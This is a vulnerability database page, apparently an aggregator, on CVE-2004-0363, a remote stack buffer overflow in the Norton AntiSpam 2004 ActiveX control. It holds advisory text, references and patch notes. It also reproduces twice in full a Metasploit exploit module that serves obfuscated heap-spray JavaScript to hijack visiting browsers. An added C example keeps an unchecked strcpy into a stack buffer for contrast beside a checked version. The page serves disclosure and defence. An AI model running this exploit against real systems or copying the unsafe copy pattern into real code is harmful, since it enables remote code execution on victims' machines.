CVE-2004-0363
CVSS 7.5
Published: 2004-04-15 00:00:00
Revised: 2016-10-17 22:44:40

[Original] Stack-based buffer overflow in the SymSpamHelper ActiveX component (symspam.dll) in Norton AntiSpam 2004, as used in Norton Internet Security 2004, allows remote attackers to execute arbitrary code via a long parameter to the LaunchCustomRuleWizard method.


[CNNVD] Symantec Norton AntiSpam Remote Buffer Overflow Vulnerability (CNNVD-200404-065)

        
        Symantec's Norton AntiSpam 2004 filters junk e-mail and works with any POP3 mail program.
        The SymSpamHelper class ActiveX component shipped with Norton Internet Security 2004 has a security flaw: a remote attacker can exploit it to carry out a buffer overflow attack and may execute arbitrary instructions on the system with the privileges of the user's process.
        The SymSpamHelper class (c:\program files\common files\symantec shared\antispam\symspam.dll) is an ActiveX component installed by Norton AntiSpam. It contains a security vulnerability: by calling the LaunchCustomRuleWizard method with an over-long parameter, an attacker can cause a stack-based buffer overflow, which may lead to execution of arbitrary instructions on the system with the privileges of the user's process. An attacker can trigger this vulnerability by constructing a malicious web page or by sending a malicious HTML e-mail.
        

- CVSS (Base Score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (Technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0363
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0363
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200404-065
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=107970870606638&w=2
(UNKNOWN)  BUGTRAQ  20040319 Norton AntiSpam Remote Buffer Overrun (#NISR19042004a)
http://marc.info/?l=bugtraq&m=107980262324362&w=2
(UNKNOWN)  BUGTRAQ  20040319 Ref: NGSSoftware Advisories NISR19042004a and NISR19042004b
http://www.kb.cert.org/vuls/id/344718
(UNKNOWN)  CERT-VN  VU#344718
http://www.nextgenss.com/advisories/antispam.txt
(VENDOR_ADVISORY)  MISC  http://www.nextgenss.com/advisories/antispam.txt
http://www.sarc.com/avcenter/security/Content/2004.03.19.html
(UNKNOWN)  CONFIRM  http://www.sarc.com/avcenter/security/Content/2004.03.19.html
http://www.securityfocus.com/bid/9916
(VENDOR_ADVISORY)  BID  9916
http://xforce.iss.net/xforce/xfdb/15536
(VENDOR_ADVISORY)  XF  nas-launchcustomrulewizard-bo(15536)

- Vulnerability information

Symantec Norton AntiSpam Remote Buffer Overflow Vulnerability
High risk  Boundary Condition Error
2004-04-15 00:00:00 2005-10-20 00:00:00
Remote
        
        

- Advisories and patches

        Vendor patch:
        Symantec
        --------
        Open Norton AntiSpam or Norton Internet Security / Professional and run LiveUpdate to update the program.

- Vulnerability information (16595)

Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow (EDBID:16595)
windows remote
2010-05-09 Verified
0 metasploit
##
# $Id: nis2004_antispam.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Norton AntiSpam 2004. When
				sending an overly long string to the LaunchCustomRuleWizard() method
				of symspam.dll (2004.1.0.147) an attacker may be able to execute
				arbitrary code.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'MC' ],
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2004-0363' ],
					[ 'OSVDB', '6249' ],
					[ 'BID', '9916' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'         => 1024,
					'BadChars'      => "\x00",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
				],
			'DisclosureDate' => 'Mar 19 2004',
			'DefaultTarget'  => 0))
	end

	def autofilter
		false
	end

	def check_dependencies
		use_zlib
	end

	def on_request_uri(cli, request)
		# Re-generate the payload.
		return if ((p = regenerate_payload(cli)) == nil)

		# Encode the shellcode.
		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

		# Set the return.
		ret     = Rex::Text.uri_encode([target.ret].pack('L'))

		js = %Q|
		try {
				var evil_string = "";
				var index;
				var vulnerable = new ActiveXObject('SymSpamBlockingUI.SymSpamHelper.1');
				var my_unescape = unescape;
				var shellcode = '#{shellcode}';
				#{js_heap_spray}
				sprayHeap(my_unescape(shellcode), #{target.ret}, 0x40000);
				for (index = 0; index < 2024; index++) {
					evil_string = evil_string + my_unescape('#{ret}');
				}
				vulnerable.LaunchCustomRuleWizard(evil_string);
			} catch( e ) { window.location = 'about:blank' ; }
		|

		opts = {
			'Strings' => true,
			'Symbols' => {
				'Variables' => [
					'vulnerable',
					'shellcode',
					'my_unescape',
					'index',
					'evil_string',
				]
			}
		}
		js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
		js.update_opts(js_heap_spray.opts)
		js.obfuscate()
		content = %Q|<html>
<body>
<script><!--
#{js}
//</script>
</body>
</html>
|

		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)

		# Handle the payload
		handler(cli)
	end

end

- Vulnerability information (F83053)

Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow (PacketStormID:F83053)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,arbitrary
CVE-2004-0363

This Metasploit module exploits a stack overflow in Norton AntiSpam 2004. When sending an overly long string to the LaunchCustomRuleWizard() method of symspam.dll (2004.1.0.147) an attacker may be able to execute arbitrary code.

###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack overflow in Norton AntiSpam 2004. When
					sending an overly long string to the LaunchCustomRuleWizard() method 
					of symspam.dll (2004.1.0.147) an attacker may be able to execute 
					arbitrary code. 
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'MC' ], 
			'Version'        => '$Revision$',
			'References'     => 
				[
					[ 'CVE', '2004-0363' ],
					[ 'OSVDB', '6249' ],
					[ 'BID', '9916' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'         => 1024,
					'BadChars'      => "\x00",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
				],
			'DisclosureDate' => 'Mar 19 2004',
			'DefaultTarget'  => 0))
	end

	def autofilter
		false
	end

	def check_dependencies
		use_zlib
	end

	def on_request_uri(cli, request)
		# Re-generate the payload.
		return if ((p = regenerate_payload(cli)) == nil)

		# Encode the shellcode.
		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
		
		# Set the return.
		ret     = Rex::Text.uri_encode([target.ret].pack('L'))
		
		js = %Q|
			try {
				var evil_string = "";
				var index;
				var vulnerable = new ActiveXObject('SymSpamBlockingUI.SymSpamHelper.1');
				var my_unescape = unescape;
				var shellcode = '#{shellcode}';
				#{js_heap_spray}
				sprayHeap(my_unescape(shellcode), #{target.ret}, 0x40000);
				for (index = 0; index < 2024; index++) {
					evil_string = evil_string + my_unescape('#{ret}');
				}
				vulnerable.LaunchCustomRuleWizard(evil_string);
			} catch( e ) { window.location = 'about:blank' ; }
		|

		opts = {
			'Strings' => true,
			'Symbols' => {
				'Variables' => [ 
					'vulnerable',
					'shellcode',
					'my_unescape',
					'index',
					'evil_string',
				]
			}
		}
		js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
		js.update_opts(js_heap_spray.opts)
		js.obfuscate()
		content = %Q|
			<html>
			<body>
				<script><!--
				#{js}
				//</script>
			</body>
			</html>
            |

		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)
		
		# Handle the payload
		handler(cli)
	end

end
    

- Vulnerability information

6249
Symantec Norton AntiSpam 2004 SymSpamHelper ActiveX (symspam.dll) LaunchCustomRuleWizard Method Overflow
Remote / Network Access, Context Dependent Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial

- Vulnerability description

A remote overflow exists in Symantec Norton AntiSpam. The SymSpamHelper Class (symspam.dll) ActiveX component fails to perform proper bounds checking resulting in a buffer overflow. By supplying an overly long string to the LaunchCustomRuleWizard method, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.
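The bounds-checking failure described above, illustrated as an added example that is not code from Symantec, NGSSoftware or the Metasploit module on this page: a hypothetical C stand-in for a method that copies a caller-supplied string into a fixed stack buffer without checking its length, placed beside a hardened form that measures first and refuses input that does not fit. The buffer size (64 bytes), the function names and the 'A' filler are assumptions; only the 8096-byte length of the constructed argument comes from the page (the module above appends a 4-byte value 2024 times).

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed size of the method's private stack buffer; the real size inside
 * symspam.dll is not stated anywhere on this page. */
#define RULE_NAME_MAX 64

/* Length of the constructed over-long argument: 2024 repetitions of a
 * 4-byte value, as in the module above, so 8096 bytes. */
#define LONG_ARG_LEN (2024 * 4)

enum { WIZARD_OK = 0, WIZARD_ERR_NULL = -1, WIZARD_ERR_TOO_LONG = -2 };

/* Pattern the advisories describe: the caller-supplied string is copied into
 * a fixed-size stack buffer with no length check, so anything longer than the
 * buffer overwrites the saved frame pointer and return address.
 * Kept for contrast only and never called with untrusted input. */
static void launch_wizard_unsafe(const char *rule_name)
{
    char buf[RULE_NAME_MAX];
    strcpy(buf, rule_name);  /* no bounds check */
    printf("wizard (unsafe) rule=%s\n", buf);
}

/* strlen with an upper bound, so a huge input costs at most max steps. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* Hardened form: reject NULL, measure with a bound, refuse input that does
 * not fit together with its terminator, then copy exactly n+1 bytes. */
static int copy_rule_name_checked(const char *rule_name, char *out, size_t out_len)
{
    if (rule_name == NULL || out == NULL || out_len == 0)
        return WIZARD_ERR_NULL;
    size_t n = bounded_len(rule_name, out_len);
    if (n == out_len)               /* string is out_len bytes or longer */
        return WIZARD_ERR_TOO_LONG;
    memcpy(out, rule_name, n + 1);  /* n characters plus the NUL */
    return WIZARD_OK;
}

/* Hypothetical checked method using a stack buffer of the same size as the
 * unsafe version, so both can be compared on the same input. */
int launch_custom_rule_wizard(const char *rule_name)
{
    char buf[RULE_NAME_MAX];
    int rc = copy_rule_name_checked(rule_name, buf, sizeof buf);
    if (rc == WIZARD_OK)
        printf("wizard (checked) rule=%s\n", buf);
    return rc;
}

/* Fills dst with a constructed argument of LONG_ARG_LEN 'A' bytes (or as many
 * as fit), NUL-terminates it and returns the number of filler bytes. */
size_t build_long_argument(char *dst, size_t dst_len)
{
    if (dst == NULL || dst_len == 0)
        return 0;
    size_t n = LONG_ARG_LEN < dst_len - 1 ? LONG_ARG_LEN : dst_len - 1;
    memset(dst, 'A', n);
    dst[n] = '\0';
    return n;
}

/* Feeds the constructed over-long argument to the checked method; a correct
 * implementation refuses it instead of copying. */
int checked_rejects_long_argument(void)
{
    static char arg[LONG_ARG_LEN + 1];
    build_long_argument(arg, sizeof arg);
    return launch_custom_rule_wizard(arg);
}

int main(void)
{
    launch_wizard_unsafe("ShortRule");  /* fits in the buffer */
    printf("checked, short: rc=%d\n", launch_custom_rule_wizard("ShortRule"));
    printf("checked, long:  rc=%d\n", checked_rejects_long_argument());
    /* launch_wizard_unsafe on the long argument would smash the stack. */
    return 0;
}
```

A real ActiveX method receives its argument as a COM BSTR rather than a char*, so the narrow-string stand-in is a simplification; the check that matters is the same in either case: measure the input before copying and refuse anything that does not fit, rather than trusting the caller to keep it short.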

- Timeline

2004-03-19 2004-03-04
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Symantec has released a patch to address this vulnerability.

- References

- Vulnerability author

- Vulnerability information

Symantec Norton AntiSpam SymSpamHelper Class Buffer Overrun Vulnerability
Boundary Condition Error 9916
Yes No
2004-03-19 12:00:00 2009-07-12 03:06:00
Discovery is credited to Mark Litchfield.

- Affected program versions

Symantec Norton AntiSpam 2004
+ Symantec Norton Internet Security 2004
+ Symantec Norton Internet Security 2004 Professional Edition

- Vulnerability discussion

Symantec Norton AntiSpam has been reported prone to a remotely exploitable buffer overrun vulnerability.

This issue exists in the SymSpamHelper Class ActiveX component, which could be invoked from a web page or HTML e-mail with malformed parameters sufficient to trigger the condition. This could be exploited to execute arbitrary code with the privileges of the client user.

- Exploit

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- Solution

Symantec has released advisory SYM04-005 relating to this issue. Please see the reference section for more information.

Fixes for this issue may be applied via LiveUpdate.

- References

 

 
